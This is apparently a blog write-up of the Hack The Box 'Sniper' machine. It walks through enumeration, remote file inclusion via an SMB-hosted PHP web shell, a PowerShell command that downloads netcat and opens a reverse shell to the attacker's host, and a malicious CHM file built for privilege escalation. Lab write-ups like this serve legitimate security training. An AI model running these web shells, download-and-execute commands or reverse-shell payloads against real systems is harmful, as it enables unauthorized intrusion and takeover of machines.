CTF WriteupsHackthebox Writeups

Hackthebox Sniper Walkthrough

Hackthebox writeups

In this article you well learn the following:

  • Scanning targets using nmap
  • Enumerate windows machine
  • RFI via smb shared folder
  • Switch user via powershell
  • Exploit microsoft compiled HTML help

Starting with namp scan:

[box type=”shadow” align=”” class=”” width=””]

nmap -Pn -v -sC -sV -oN sniper.nmap 10.10.10.151

PORT STATE SERVICE VERSION

80/tcp open http Microsoft IIS httpd 10.0

| http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Sniper Co.

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows[/box]

Enumeration web directory:

[box type=”shadow” align=”” class=”” width=””]gobuster dir -u http://10.10.10.151/ -w /usr/share/wordlists/dirb/common.txt

/blog (Status: 301)

/Blog (Status: 301)

/css (Status: 301)

/Images (Status: 301)

/images (Status: 301)

/index.php (Status: 200)

/js (Status: 301)

/user (Status: 301)[/box]

After Enumeration I saw there’s get parameter in /blog for lang for get a page with specific lang.
http://10.10.10.151/blog/?lang=blog-fr.php
It’s seems to be LFI/RFI exploit.
I start to exploit it LFI attack with no success , and after an hour of research I found there’s
technique for RFI via SMB shared folder

https://medium.com/@minimalist.ascent/remote-file-include-using-samba-shares-6fa76dfeb4ce

Creating an SMB Shared Folder need some steps
First I edit smb.conf in /etc/samba

Second step:

$ mkdir Shell
$ chmod -R 777 Shell/
$ touch cmd.php

In cmd.php:

[box type=”shadow” align=”” class=”” width=””]

<?php
system($_GET[‘cmd’]);
?>

[/box]

Then start smb and nmb deamons with:

$ service smbd start
$ service nmbd start

After that, I browsed my shell and executed the following commands :

$ dir c:\
$ mkdir C:\m
$ powershell.exe -ep bypass -nop -command “iwr -uri http://10.10.14.43/
nc64.exe -outfile C:\m\nc64.exe”
$ C:\m\nc64.exe 10.10.14.43 9091 -e powershell.exe

Then I got reverse shell to the machine:

After some enumeration I found db.php ( database connection string ) :

There’s a weird comment , it’s seems the password not for database user , I got the
users in the machine and tried Credentialed Scan on it using smb service with Chris
user.

And it’s a valid creds for Chris User

I this case I have a valid creds for another user and reverse shell with iuser , I decided to
write a script to switching user from iuser to Chris , there’s a good way in powershell
using pscredential

After running the script I got a reverse shell.

And I got User flag

Privilage Escalation:

I run $ whoami /all to check user permissions and groups

After some manual enumeration I decided to run tree command in Chris folder , and I
found instructions.chm file in Download folder.

I move the file to my machine via netcat ( working in cmd.exe this symbol “ < “ )
And I got the file type it’s ( MS Windows HtmlHelp Data )

to read .chm files in linux, I used kchmreader application:

After few minuts i found another interesting file ( notes.txt ) in c:\Docs

After reading this I decided to create CHM payload and drop it in Docs
Generating CHM file Done

[box type=”shadow” align=”” class=”” width=””]$ Download Out-CHM.ps1 $ Import-Module .\Out-CHM.ps1 $ Command: Out-Chm -Payload “C:\m\nc64.exe 10.10.14.43 9098 -e powershell.exe” -HHCPath “C:\Program File (x86)\HTML Help Workshop”[/box]

After i generate .chm payload i upload it to Docs folder and setup listener and I received a
reverse connection from the machine

And I got the root flag.

That’s all folks , hope you enjoyed this writeup.

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
Close